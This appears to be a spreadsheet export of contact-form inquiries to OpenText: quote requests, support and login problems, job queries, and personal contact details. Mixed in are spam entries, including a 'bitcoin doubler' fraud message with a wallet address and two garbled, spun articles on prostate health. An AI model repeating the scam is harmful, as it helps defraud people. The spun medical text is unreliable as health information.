    <t xml:space="preserve">Windows Server 2016 - Vendor Questionnaire. Hampshire County Council have a version of eWork v.003 - Metastorm BPM7.6SR4. We are currently in the process of upgrading to Windows Server 2016. To assist in this project we are asking suppliers to complete a short questionnaire. Please could I have contact details of a support person who will be able to assist?_x000D_
_x000D_
Kind regards,_x000D_
Felicity Smith _x000D_
</t>
  </si>
  <si>
    <t>Dear Sir / Madam our company is currently a customer of yours as we use an EDI system supported by yourselves. We currently have set up new supply of our products to Aldi and I would need Aldi to be set-up within our EDI system. I would also need someone to input the information needed for the communication to work. On another note Aldi have sent me a link to provide EDI information to them however I see that this link is actually hosted by GXS Onboarding. I was hoping that our information that you hold for us could be passed to the onboarding team to complete Aldi's request. I look forward to hearing from you._x000D_
Kind regards_x000D_
Grant Findlater</t>
  </si>
  <si>
    <t xml:space="preserve">Please enter a Service Request._x000D_
_x000D_
The website will not let me do it._x000D_
_x000D_
NCDOT_x000D_
Site id was 7813273- not sure what is its now._x000D_
_x000D_
Warning message Please advise._x000D_
</t>
  </si>
  <si>
    <t>Request for quote</t>
  </si>
  <si>
    <t>We have an open text opportunity for a very big danish public sector customer - please call me ASAP</t>
  </si>
  <si>
    <t>We have placed some orders which need to be processed soonest. The Opentext Account executive looking after our orders is on leave, Could someone please help !</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I stumbled upon your website and found it quite impressive._x000D_
_x000D_
I'm Mike (Senior Business Development Executive) from a reputed ISO Certified, Google Partner company._x000D_
_x000D_
We are a One-Stop Web Shop team of 50 Experts who can efficiently handle all your additional work as your back-end team._x000D_
_x000D_
Our Rate: $10/ hour_x000D_
_x000D_
_x000D_
What can we do in your back-end_x000D_
  •High-end Websites in WordPress, Magento, Shopify, .Net, PHP (Custom design as well as theme based)_x000D_
  •SEO, SMO, PPC, ORM_x000D_
  •Sales Page, Logo, Graphic design_x000D_
  •Mobile Apps_x000D_
_x000D_
Why us _x000D_
_x000D_
Save upto 70% of your cost by outsourcing your work to us_x000D_
Actively concentrate more on expanding your business with new customers while we, as your back-end team, handle the technical stuff for you._x000D_
_x000D_
Work Process:_x000D_
_x000D_
You'll get Daily Work Report, real-time Work-in-Progress Update and quick communication with your 100% satisfaction._x000D_
_x000D_
Do let me know your Phone/ Skype id if you're interested for a quick discussion. _x000D_
_x000D_
Warm Regards,_x000D_
_x000D_
Mike Smith_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I am Sanjeev  from a leading Search Engine Optimization (SEO) Company based in India._x000D_
_x000D_
As per the trends in your industry - over 80% of people search for your products/services online and buy the same.      _x000D_
_x000D_
1. Would you like to increase the leads / sales generated from your website?_x000D_
_x000D_
2. Do you want Google promotion Service in Affordable price? _x000D_
_x000D_
3. Would you like to be listed at the top of every major search engine such as Google, Yahoo! &amp; Bing for multiple search phrases (keywords) relevant to your products / services?_x000D_
_x000D_
It would be recommended if you go for search engine optimization (SEO) for your website which would increase your web visibility and generate better prospect traffic to your website._x000D_
_x000D_
There is a simple equation that is applicable to the online world._x000D_
_x000D_
Ethical SEO = Better Traffic Higher Sales_x000D_
_x000D_
Do let me know if you are interested and it shall be our pleasure to give you Details about our services, Price list and Offers._x000D_
_x000D_
I look forward for your reply. _x000D_
_x000D_
----------------------_x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Sanjeev Yadav</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
I need to contact someone who can help me to discuss the Royalties Burroghs Inc. needs to pay to Open Text.Can someone reaach out to me to initiate this process and have these Royalties paid to you?_x000D_
thanks_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
this morning I signed up for your webinar of this afternoon about Records Management but I have not yet received the details about the webinar. It's correct?_x000D_
Thank you,_x000D_
Regards_x000D_
Pamela Ferrari</t>
  </si>
  <si>
    <t>We are looking for a solution to address the voluminous  hardcopy documents in the office._x000D_
Appreciate if a sales person can contact me for a discussion on our requirements._x000D_
Thank you</t>
  </si>
  <si>
    <t>Information EDI to work with MACY's - Bloomingdales</t>
  </si>
  <si>
    <t>Requesting you to kindly map my account to "Accenture LLP – EU0001248" Contract. So that I could start accessing the knowledge center asap._x000D_
Request your assistance urgently, so could access the center._x000D_
Regards.</t>
  </si>
  <si>
    <t>We would like to try "OpenText NFS Client &amp; NFS Solo" for AWS EFS._x000D_
I also receive trial license(NFSSolo14J_Eval_64bit) from macnica, but it don't work.</t>
  </si>
  <si>
    <t>Greenfield project require a DMS to manage document control and content management</t>
  </si>
  <si>
    <t>Dear Sir, Dear Madam, I use a software named "AFP STUDIO" edited by HP. I can't call the HP support for this software because it has moved somewhere but i don't know where ... Is it your company which own this software know ??_x000D_
Thank you by advance._x000D_
_x000D_
Stéphane,_x000D_
_x000D_
I had a customer account on the HP platform</t>
  </si>
  <si>
    <t>Dear Sales,_x000D_
         Please email about Opentext Alchemy which include product detail, system requirement and price for reference. Thank you</t>
  </si>
  <si>
    <t>We are interested in using RightFax in conjunction with EZCAP for faxing the letters. Please contact asap. Thank you.</t>
  </si>
  <si>
    <t>Dear OpenText support team,_x000D_
_x000D_
I need help._x000D_
_x000D_
when I try to access in knowledge bases, support link. but it can't accessing. I'm pressed "request confirmation email" at many time, it sent link to confirm. after confirm it loop back to 'request confirm..." again._x000D_
_x000D_
but other my colleage can accessing to that link._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Songvit</t>
  </si>
  <si>
    <t>I was wondering if there is any way to change the notification sound in FirstClass?  thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am interested in creating e-learning content on OpenText Exstream for a target audience of students who are interested to learn Exstream and make it as their career, beginners who have just started their career as an exstream/dialogue consultant and also for seasoned professionals as a self help guide._x000D_
_x000D_
I see that there is a huge market for developers who can build using OpenText CCM/Exstream platform but people who have just started do not know - how do they gain this knowledge._x000D_
_x000D_
I would seek your permission in creating content by making use of my 13 years of experience in Software Industry and contribute in a small way to build the OpenText CCM/Exstream brand._x000D_
_x000D_
Please let me know if there are any legal obligations and I do not mind dropping this plan._x000D_
_x000D_
Thanks,_x000D_
Ratnavarma_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
_x000D_
I stumbled upon you guys as one of the more innovative tech companies in Canada. What you guys bring to corporations is exactly what I'm most interested in and am incredibly interested in how you guys incorprate AI and IoT for business solutions. I'm wondering if you guys have any internship positions available for the upcoming school terms? Thanks in advance._x000D_
_x000D_
Leo</t>
  </si>
  <si>
    <t>TAS</t>
  </si>
  <si>
    <t>Joji John request a Government Technology Conditions Deed of Agreement.  After a number of follow ups and nil response from Open Text this request is being cancelled.  Should Open Text still require a GITC agreement please contact me.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I require support license opentext Brava</t>
  </si>
  <si>
    <t>We are interested in information about your integrated end-to-end RIM solution(s).</t>
  </si>
  <si>
    <t>I would like to get a quote for the fax solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to do an integration for a specific client. I need some primer information on what is needed to develop against your API and info on deploying to production. We'll probably also need to establish an account if we don't have one already (we may, I'm really not sure). </t>
  </si>
  <si>
    <t>I need to do an integration for a specific client. I need some primer information on what I need to develop against your API and info on deploying to production. We'll probably also need to establish and account if we don't have one already. (We may, I'm really not sure)</t>
  </si>
  <si>
    <t>I am a new consultant who works for MetaSource (Mackin Imaging) and need access to their support accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a product to take the place of SharePoint. </t>
  </si>
  <si>
    <t>We have encase enterprise (now enterprise basic). I'm looking for some information regarding its capabilities.</t>
  </si>
  <si>
    <t>My company currently has RightFax on premise in the US and a separate instance in Canada. I would like to explore the option of a managed service and migrating current platform.</t>
  </si>
  <si>
    <t>**Hello again: I have re-sent this message with the corrected phone number - apologies.  Also, I prefer to be contacted by email, due to my hearing loss.** _x000D_
_x000D_
Hello, _x000D_
_x000D_
I am running a conference on behalf of ARMA Vancouver Island on the concept of Blockchain, and was wondering if OpenText would like to participate as a vendor.  I estimate that 50 records managers will attend the event.  _x000D_
_x000D_
Looking forward to hearing from you. _x000D_
_x000D_
Kate</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am running a conference on behalf of ARMA Vancouver Island on the concept of Blockchain, and was wondering if OpenText would like to participate as a vendor.  I estimate that 50 records managers will attend the event.  _x000D_
_x000D_
Looking forward to hearing from you. _x000D_
_x000D_
Kate</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please provide SMS renewal quote for the following EnCase dongles in 1 year, 2 years, and 3 years?_x000D_
_x000D_
EnCase dongle number	SMS Expiration Date_x000D_
G2002040621	10/1/2018_x000D_
V891152360	10/1/2018_x000D_
V1543248864	10/1/2018_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I are from Portugal and work with collection of paper forms, I like know who I can contact if I want purchase a new license of Teleform._x000D_
I have one old license of Teleform acquired from Cardiff, I can do upgrade or need to purchase a new license.</t>
  </si>
  <si>
    <t>Hello.  We verify certifications for employers.  We had previously verified certifications when they were offered by Guidance Software._x000D_
_x000D_
Through Guidance Software, we checked the Certified Professionals link (the Contact Form won't allow me to include the link).  We then sent an email, along with a signed release from the candidate, to Guidance Software (the Contact Form won't allow me to include the email address) to obtain the full certification information (issue and expiration dates, current status of certification, and if disciplinary action (ex. probation, revocation, reprimand) has been taken._x000D_
_x000D_
Can you advise if we follow the same process now that the certifications are issued through OpenText?  If the same process is followed, can you confirm the link and email address we should use to obtain verification?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Gostaria de saber se vocês possuem alguma solução para gestão do ciclo de vida de políticas e normas de uma organização, com workflow de elaboração, aprovação, publicação e revisão; definição de usuários/perfis responsáveis, controle de vigência das normas etc. </t>
  </si>
  <si>
    <t>I need to know compatibility of Team Developer with versions of Oracle and versions of Windows.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Account locked_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
           I am an employee of KAR/ ADESA inc. We have support license with open text. Can you please grant me the access to support ?</t>
  </si>
  <si>
    <t>Hi, Open Text, Can I please have all Open Text Exstream materials for one pass, 2 pass, and details about creating Presort and post sort files in 2-pass process.</t>
  </si>
  <si>
    <t>We are working on a project in evaluating potential integrators who would be able to evaluate our current broadcast storage set up and workflows to provide a Data Asset Manager solution that will work best for our Broadcast Operations department as well as continuous suppport. I was curious if you have done anything like this for other large enterprise universities who have high broadcast demand and if so, which higher education establishments do you work with?</t>
  </si>
  <si>
    <t>Can encase install in MacAir?</t>
  </si>
  <si>
    <t>Locked out of account, can't get password re-set to work!</t>
  </si>
  <si>
    <t>Requesting a quote for OpenText's fax solution.</t>
  </si>
  <si>
    <t>I am Noel kaaya from Tanzania,Software Developer. I have my project Secure SmS App, is mobile text application. I sale for 1USD subscription a year, I have like 17,000 subscribers till now. _x000D_
I am looking for investor, partner that can help my application to take to International._x000D_
_x000D_
Regards,_x000D_
Noel Kaaya</t>
  </si>
  <si>
    <t xml:space="preserve">As Audi Mexico we are evaluating to implement Documentum  as Platform Solution, therefore we would like to explore with Open Text Mexico which could be the service offer for Audi Mexico regarding this Enterprise Content Management Solution_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I can not access the "My Support" page. The website keeps redirecting me to the login page when I try to access the "My Support" page, even if I am already logged in. </t>
  </si>
  <si>
    <t>Would like a Demo and quote. Current 20 Users team but will grow to 100+ within three years.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a DMS-system. Approximately 1000 employees </t>
  </si>
  <si>
    <t>We are moving to Windows 10 and need a version of OpenText Exceed that is compatible - we currently use V14. Are you able to advise what we need to do?</t>
  </si>
  <si>
    <t>bonjour_x000D_
je souhaite avoir votre offre de prix pour l'achat de ce logiciel_x000D_
merci de votre retour</t>
  </si>
  <si>
    <t xml:space="preserve">One of our customer is interested in CCM solution. I would like to schedule some time to understand your solutions capabilities and evaluate of it is a good fit for our customer. </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to release an RFP document for the selection of a customer web portal. Would like to discuss with a UK representative to provide an overview of our requirement and understand who will lead from Open Text. Please contact me on the mobile number provided. </t>
  </si>
  <si>
    <t>More information on your CMS platform</t>
  </si>
  <si>
    <t>Our current B2B EDI and Vendor Connect has been compromised by a hacker._x000D_
We are in urgent need of assitance. We need our EDI B2B up and running ASAP._x000D_
_x000D_
Thank you_x000D_
lisa_x000D_
61 0423607717</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team, I am Shilpa from Logistic Solutions.  Our reason for approaching you is that we are seeking an opportunity to become reselling partners ( Partnership program)._x000D_
_x000D_
Kindly let us know who could be the right person to talk about partnership program and further steps. _x000D_
</t>
  </si>
  <si>
    <t>request to be contacted by local person from India</t>
  </si>
  <si>
    <t>1) Looking for ECM which is tightly integrated with SAP._x000D_
2) To manage Vendor Invoice Management._x000D_
3) Open workflow to configure - Sequential, Parallel &amp; Forward, Backward &amp; Escalation_x000D_
4) Can be used by SAP &amp; non-SAP users to view the data_x000D_
5) Cases to handle: i) PO with GR, ii) PO without GR, iii) No PO &amp; no GR_x000D_
6) Linking Supplier invoice, Our document generated thru SAP, Other scanned document_x000D_
7) Attaching metadata with scanned document_x000D_
8) Document lock for payment till the last person approves the document in workflow_x000D_
9) Confirmation by every approver as the document seen and checked _x000D_
10) can be used for other SAP &amp; non-SAP transactions_x000D_
11) to work with SAP ECC 6.0 EHP0 and should not give any problem on SAP upgrade to ECC or S/4 HANA_x000D_
12) more to follow.... if above can be managed....</t>
  </si>
  <si>
    <t xml:space="preserve">Meine sehr verehrten Damen und Herren,_x000D_
Herr Dr. Thomas Hobmaier hat ein Buch zur Veröffentlichung vorliegen und das wurde geschrieben mit Windows 10 und Times New Roman._x000D_
Da das Buch über den twenty-six Verlag, eine Kooperation mit dem Bertelsmann Verlag vertrieben werden soll, staute sich eine Herausforderung an. Die Herausforderung ist, dass die Seitenlayouts - also die farbliche Aufmachungen (Deckblatt, Bild und Graphiken)nicht kompatible bzw, nicht die erforderliche Pixelstärke von 300 dpi erreicht, sondern nur 70 dpi vorliege. Übersetzt, es muss doch möglich sein, die auf 300 dpi "hochzufahren". Oder die andere Alternative, weil Herr Dr. Hobmaier an einem neuen Buchprojekt dran ist, diese stressige Angelegenheit von vornherein ausgeschlossen werden soll, ein Programm zu erhalten, dass solche Situationen nicht noch einmal auftreten und somit Vorsorge getroffen werde._x000D_
Könnten Sie mir einen Voranschlag unterbreiten, welches für einen "Kleinen" Schriftsteller notwendig  sei, um noch einmal davon abhängig zu sein, dass ein Verlag seine eigene Software hat und beide kompatibel somit vorliegen._x000D_
Auf eine Rückantwort würde Herr Dr. Hobmaier sich freuen und verbleibt mit freundlichen Grüßen_x000D_
Dr. Thomas Hobmaier_x000D_
(weil per E-mail, Unterschrift nicht im Original)  </t>
  </si>
  <si>
    <t>Hallo,_x000D_
ich wir sind auf der Suche nach 2 passenden Kursen im Archiv-Server Umfeld für 2 Kollegen mit unterschiedlichen Knowhow und würden dazu gerne mal mit Ihnen telefonieren. Bitte um Rückruf._x000D_
Danke und Gruß_x000D_
Uwe Burst</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Ende 2008 hat mein Arbeitsvertrag bei Ihnen in München geendet. Leider habe ich in der Zwischenzeit mein Arbeitgeberzeugnis verlegt und wollte Sie bitten mir dieses erneut (re reicht auch elektronisch) zuzusenden._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Mark Vollmann</t>
  </si>
  <si>
    <t>Assistance required to connect Gupta Report Builder via OBDC._x000D_
Product Media Code: E527E27D-946CD199-79CC14D7-3713EEFC._x000D_
My support will not allow me access even though I have registered and confirmed email._x000D_
Appreciate any help._x000D_
Best regards_x000D_
Stewart</t>
  </si>
  <si>
    <t>CU</t>
  </si>
  <si>
    <t>Hello friends. I want to share with you a magical purse that doubles your bitkoins. I do not know why this works, but it works! _x000D_
For a month I have already earned 3,579 bitcoins and I'm a millionaire, repaid all loans and debts, _x000D_
I bought myself an elite housing and yesterday I took a new Lamborghini from the saloon. _x000D_
The essence of the purse is that you send him 1 bitcoin and after 3 hours you get 2 bitcoins. Y _x000D_
ou can not send less than 1 bitcoin. Personally, I send around 150 bitcoins from different wallets to 1 bitcoin per day, _x000D_
so as not to risk. If you do not take this chance, promise me then do not tear your hair on my head when you find out that _x000D_
people have become millionaires using this bug in the system. Hurry up until this vulnerability is covered. _x000D_
Here is the purse doubler bitcoins: 1CUy8HNo6vebvyGaBQuEdDtv5LSkibKGE3</t>
  </si>
  <si>
    <t>qiero saber el costo por el servicio</t>
  </si>
  <si>
    <t>We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. (GUARANTEED RESULTS) Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I want to buy EnCase Forensic Academic version </t>
  </si>
  <si>
    <t>Hi OpenText, _x000D_
_x000D_
I'm a manager in the Advisory Services at KPMG Toronto. _x000D_
 _x000D_
We're currently engaged with a major Canadian FI that is looking at bulk digitization of key records. They are impressed by your Enterprise content management (ECM) software and related case studies. _x000D_
 _x000D_
I was wondering if I get some more information about your ECM offerings, specifically content archiving solutions? _x000D_
_x000D_
Let me know if you're available for a 30 minute phone meeting to discuss in more detail. _x000D_
_x000D_
Thanks, _x000D_
Ethan</t>
  </si>
  <si>
    <t xml:space="preserve">Quisiera saber informacion de sus costos por favor </t>
  </si>
  <si>
    <t>i'm trying to join EnCase App Central Developer Network(/app/become-a-developer). i completely filled out all of the inputs. but it fails with "Country is required" message. in this page, country field is not exist. it seems bug.</t>
  </si>
  <si>
    <t>Partnership with opentext for national solutions in Angola._x000D_
Best regards, _x000D_
João Bastos Almeida</t>
  </si>
  <si>
    <t>Service</t>
  </si>
  <si>
    <t>I wish to experience the trial version of Open Text Analytics but I am not on Windows. My device uses Ubuntu Linux but I have access also to a Mac environment. Many thanks.</t>
  </si>
  <si>
    <t>TF</t>
  </si>
  <si>
    <t>传说中的龙吃魔豆</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Reason for my contact is for more information about the IT System Administrator Internship (Ref#: 19988 Function: Engineering Location: US, MD, Gaithersburg)._x000D_
_x000D_
Does this internship accept post college graduate applicants?_x000D_
Does this internship offer a wage for accepted candidates?_x000D_
_x000D_
Thank you,_x000D_
Oscar</t>
  </si>
  <si>
    <t>Looking For Any Suitable Position</t>
  </si>
  <si>
    <t>the work</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning._x000D_
_x000D_
My name is Martin Hoffmaster.  I am one of two end users/Digital Forensic Examiners, for the Charles County Sheriff's Office in Maryland.  The other end user/Digital Forensic Examiner is Justing Brackett.  Yesterday, I created an Opentext account for dfu@ccso.us and have attempted to register our license dongle (V624812353U), but have not received an email with the cert files we need for the EnCase Forensic Software v8.07 and v6.19.  I am not able to find a place to download the cert files from your website.  The dfu@ccso.us is an email address that both Justin and I will receive email._x000D_
_x000D_
Can you please provide the cert files neede to use EnCase Forensic vertion 6.19 and EnCase Forensic version 8.07?_x000D_
_x000D_
Can you also provide instructions for how we may upgrade the license dongle from our current Hap dongle to the new Code Meter dongle?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Martin Hoffmaster, EnCE_x000D_
_x000D_
Digital Forensic Examiner Hoffmaster #1854_x000D_
Digital Forensics Unit_x000D_
Charles County Sheriff's Office_x000D_
3670 Leonardtown Road, Waldorf, MD  20601_x000D_
hoffmasterm@ccso.us_x000D_
Office: 301-609-6489_x000D_
_x000D_
The PO number for the already paid for order is 18-0003007 dated 5/31/2018. with a ship to address of "Charles Co. Sheriff's Office, Headquarter's Building, 6915 Crain Highway, La Plata, MD  20646"  An old address for the previous user of the software was the "Charles County Sheriff's Office, Crime Lab, 100 Kent Ave., La Plata, MD 20646" </t>
  </si>
  <si>
    <t>Позвоните мне, пожалуйста, по этому номеру 8(812) 426-88-69</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I wanted to enquire about being referenced on your website. I work for the ISO Certified Supplier network - QualityTrade  we help companies connect with trusted, vetted certified suppliers from around the world. _x000D_
_x000D_
My job is to find suitable websites who might reference what we do on their website._x000D_
We know hard it is for people to find trustworthy suppliers online. Did you know that:_x000D_
•        15% of imports result in losses_x000D_
•        9 million people die each year from industrial pollution_x000D_
•        317 million are injured or die from work related incidents _x000D_
•        There are 153 Million kids in child labour _x000D_
_x000D_
By trading with certified companies you can ensure you’re dealing with a legitimate company and that the company does the right thing by their customers, employees and the environment. With a reference on your site we can make sure your readers have access to certified companies so they don’t lose any more money to scamming businesses and they can have faith their suppliers are ethical.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking opportunity </t>
  </si>
  <si>
    <t>These are actually great ideas in on the topic of blogging. You have touched some nice factors here. Any way keep up wrinting.</t>
  </si>
  <si>
    <t>Need to know the cost of license (and purchase if it fits my budget) for using Provision.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for job opportunities </t>
  </si>
  <si>
    <t>My grand father always used to watch YouTube funny video clips, hehehehehe, since he wants to be cheerful forever.</t>
  </si>
  <si>
    <t>Me required for the semilar job</t>
  </si>
  <si>
    <t>I want to know the price for the service</t>
  </si>
  <si>
    <t>Wow, what a quality it is! Since mostly YouTube video clips have no nice feature, however this is genuinely a nice quality video.</t>
  </si>
  <si>
    <t>Looking for information regarding document gathering, conversion and redaction.</t>
  </si>
  <si>
    <t>The prostate gland is the central a part of a male's reproductive :. It secretes fluids that assist the transportation and activation of sperm. The prostate is found just as you're watching rectum, below the bladder and surrounding the urethra. When there is prostate problem, it is usually really miserable and inconvenient for that patient as his urinary product is directly affected. _x000D_
 _x000D_
The common prostate health conditions are prostate infection, enlarged prostate and prostate cancer. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, often known as prostatitis, is easily the most common prostate-related overuse injury in men younger than 55 years. Infections with the prostate related are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis is the least common of kinds of prostate infection. It is a result of bacteria based in the large intestines or urinary tract. Patients may experience fever, chills, body aches, back pains and urination problems. This condition is treated through the use of antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to alleviate the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is a condition of the particular defect inside the gland and the persistence presence of bacteria inside the urinary tract. It can be due to trauma to the urinary tract or by infections received from other regions of the body. A patient can experience testicular pain, spine pains and urination problems. Although it is uncommon, it may be treated by removal in the prostate defect followed by the employment antibiotics and NSAIDs to treat the redness. _x000D_
 _x000D_
Non-bacterial prostatitis accounts for approximately 90% of most prostatitis cases; however, researchers have not yet to create what causes these conditions. Some researchers believe chronic non-bacterial prostatitis occur as a consequence of unknown infectious agents while other feel that intensive exercise</t>
  </si>
  <si>
    <t>I have a Gupta Report Builder 4.1 CD that I got from Amtech Futura several years ago. My new computer doesn't have a DVD/ CD player and I was wondering if there is a download site to get the program. I have product code and a license number on the disk. If that is available can you please give me the ftp or web address for the download?_x000D_
Thank you, Tom</t>
  </si>
  <si>
    <t>My team at EY is interested in demos for any repositories or tools for managing records (enterprise/centralized repository). We are also interested in a tool or solution for managing the records schedule, itself (i.g., live updates that come via legal research, integrations with legal/regulatory requirements, workflows around updating/maintaining a schedule). Do you have anyone who can set up a demo with us for a tool that meets these needs either this Monday, September 10 or Tuesday, September 11?</t>
  </si>
  <si>
    <t>I wanted to ask you some questions regarding the integration of internal software with OpenText. I also wanted to ask how the integration with SharePoint works.</t>
  </si>
  <si>
    <t xml:space="preserve">Does ProVision has an application for reviewing employee access to repositories and notebooks. This review will also allow for tracking of employees that have left church employment or transferred to another department and no longer require access to a notebook or repository or ProVision altogether._x000D_
</t>
  </si>
  <si>
    <t>Questions about fax2mail</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in quote for 15 licenses for Exceed on Demand </t>
  </si>
  <si>
    <t>Support on for an existing customer (quote)</t>
  </si>
  <si>
    <t>Olá!_x000D_
Estou interessado na vaga de analista de suporte sênior divulgada no LinkedIn. _x000D_
Caso o meu perfil atenda os requisitos, estarei a disposição para conversar._x000D_
Att_x000D_
Françoso Plínio Pontes</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
This is my fourth inquiry (the other 3 were direct emails) about gaining access to complete the exercises provided in my OnDemand training. I am still waiting to gain acccess and it is holding up my training and ability to register for course I have to take for work. Can someone please tell me when I will be able to gain access?</t>
  </si>
  <si>
    <t>We are evaluating CCM tools and need a demo and pricing etc.</t>
  </si>
  <si>
    <t>We are currently running Teleform 10.5.1 (2011).  We would like to purchase a new license with an additional verifier module.  We would like to know the cost, who to buy from, and what the hardware/software requirements would be.</t>
  </si>
  <si>
    <t>There are also so many video uploading web pages, and these as well give facility for distribution their videos, but I think YouTube is the finest.</t>
  </si>
  <si>
    <t>I need to get my email set up for the log in for GXS. The person that was getting the emails is no longer here.</t>
  </si>
  <si>
    <t>Please provide the Export Control Classification Number (ECCN) for Free DWG Viewer</t>
  </si>
  <si>
    <t xml:space="preserve">We are updating our vendor files and while reviewing your information we have found that we do not have a current W9 for your company. Could you please provide this information so we can get your account updated? If you are interested in ACH, please provide an email address to forward your payment notifications to. I appreciate your help. _x000D_
_x000D_
Cathy Gordon_x000D_
Accounts Payable Associate_x000D_
Chemical Bank, Accounts Payable_x000D_
_x000D_
_x000D_
525 Water Street | 2nd floor_x000D_
Port Huron, MI | 4806_x000D_
T: 810-990-1576| F: 810-990-1527_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am contacting your company to see how much it would be to move our files from paper to electronic pdf's. We are a law office so we would have multiple files. </t>
  </si>
  <si>
    <t>Currently using ApplicationXtender for AP approval process in Viewpoints Content Management solution. Wondering if OpenText has an AP Approval solution that leverages our AX licensing</t>
  </si>
  <si>
    <t>I bought the Brava program! Desktop DXP, but I can not download and install, please help me.</t>
  </si>
  <si>
    <t>Is it possible to add a date stamp on the fax received? Is it possible to customize it?</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning_x000D_
_x000D_
I am a consultant and I am currently in a consultancy with the company Equion Energy- Colombia, this company wants  do tests with opentext ETX on Linux platform with the application openworks 2D and 3D. We want to know if we count on you to perform these tests?_x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Pedro Ibañez_x000D_
_x000D_
Consultor_x000D_
_x000D_
Big Brother Group SAS </t>
  </si>
  <si>
    <t>pls send trial version</t>
  </si>
  <si>
    <t>Sales enquiry for the Tableau TX1 Forensic Imager Kit</t>
  </si>
  <si>
    <t>Need new license keys for Xenos product</t>
  </si>
  <si>
    <t>I need the contact information for our account rep or the contact information to discuss discontinuing our service for the ANX VAN product.</t>
  </si>
  <si>
    <t>Op zoek naar een nieuw DMS systeem. Omvang heeft betrekking op 1000+ gebruikers._x000D_
Via de telefoon niet naar de juiste afdeling doorverwezen.</t>
  </si>
  <si>
    <t>Status update on new patch and integration with windows 10, Share Point, and Web Access</t>
  </si>
  <si>
    <t>Hi, _x000D_
we are a swiss company (in Ticino) and we saw that you are connected to a domain that we'd like to buy: hcl(dot)ch_x000D_
_x000D_
We do not know if we are in the right place, but the connection is between your company and an old one that you bought years ago._x000D_
(Hummingbird SA » IXOS software AG)_x000D_
This is why we are contacting you directly._x000D_
_x000D_
Would you consider to sell this domain?_x000D_
_x000D_
Hope to get an answer._x000D_
Regards_x000D_
Giovanni Boldini_x000D_
softCodex Sagl</t>
  </si>
  <si>
    <t>Please update our company's contact information. _x000D_
Email Address: hqsupport@ijm.org_x000D_
_x000D_
It might currently be under ijmfax@ijm.org_x000D_
_x000D_
Also, please send all bills for August 2018 to hqsupport@ijm.org_x000D_
_x000D_
Thank you for your help._x000D_
Christina Park</t>
  </si>
  <si>
    <t>Good morning! I saw some open positions for product management and just wanted to make a general inquiry as to whether or not your company is willing to sponsor H1B? Please let me know at your earliest convenience. I appreciate your time. Thank you!</t>
  </si>
  <si>
    <t>We are a research group, who collects some of its data through questionnaires. We have been thinking about updating the way we process questionnaires and have been recommended to try TeleForm from another group._x000D_
We were wondering if it would be possible to have a demonstration of TeleForm We are interested to learn more about the software and how easy it is to use._x000D_
Also how much does it cost?</t>
  </si>
  <si>
    <t>The men's prostate is central to the section of a male's the reproductive system. It secretes fluids that aid in the transportation and activation of sperm. The men's prostate is situated just in front of the rectum, below the bladder and all around the urethra. When there is prostate problem, it is usually very uncomfortable and inconvenient for the patient as his urinary strategy is directly affected. _x000D_
 _x000D_
The common prostate health issues are prostate infection, enlarged prostate and prostate cancer. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, also called prostatitis, is regarded as the common prostate-related condition in men younger than 55 yrs . old. Infections in the prostate are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis will be the least common of all kinds of prostate infection. It is caused by bacteria based in the large intestines or urinary tract. Patients can experience fever, chills, body aches, back pains and urination problems. This condition is treated by utilizing antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to alleviate the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is often a condition of a particular defect within the gland and the persistence presence of bacteria inside urinary tract. It can be caused by trauma towards the urinary tract or by infections received from other parts with the body. A patient can experience testicular pain, small of the back pains and urination problems. Although it is uncommon, it could be treated by removal in the prostate defect accompanied by making use antibiotics and NSAIDs to help remedy the soreness. _x000D_
 _x000D_
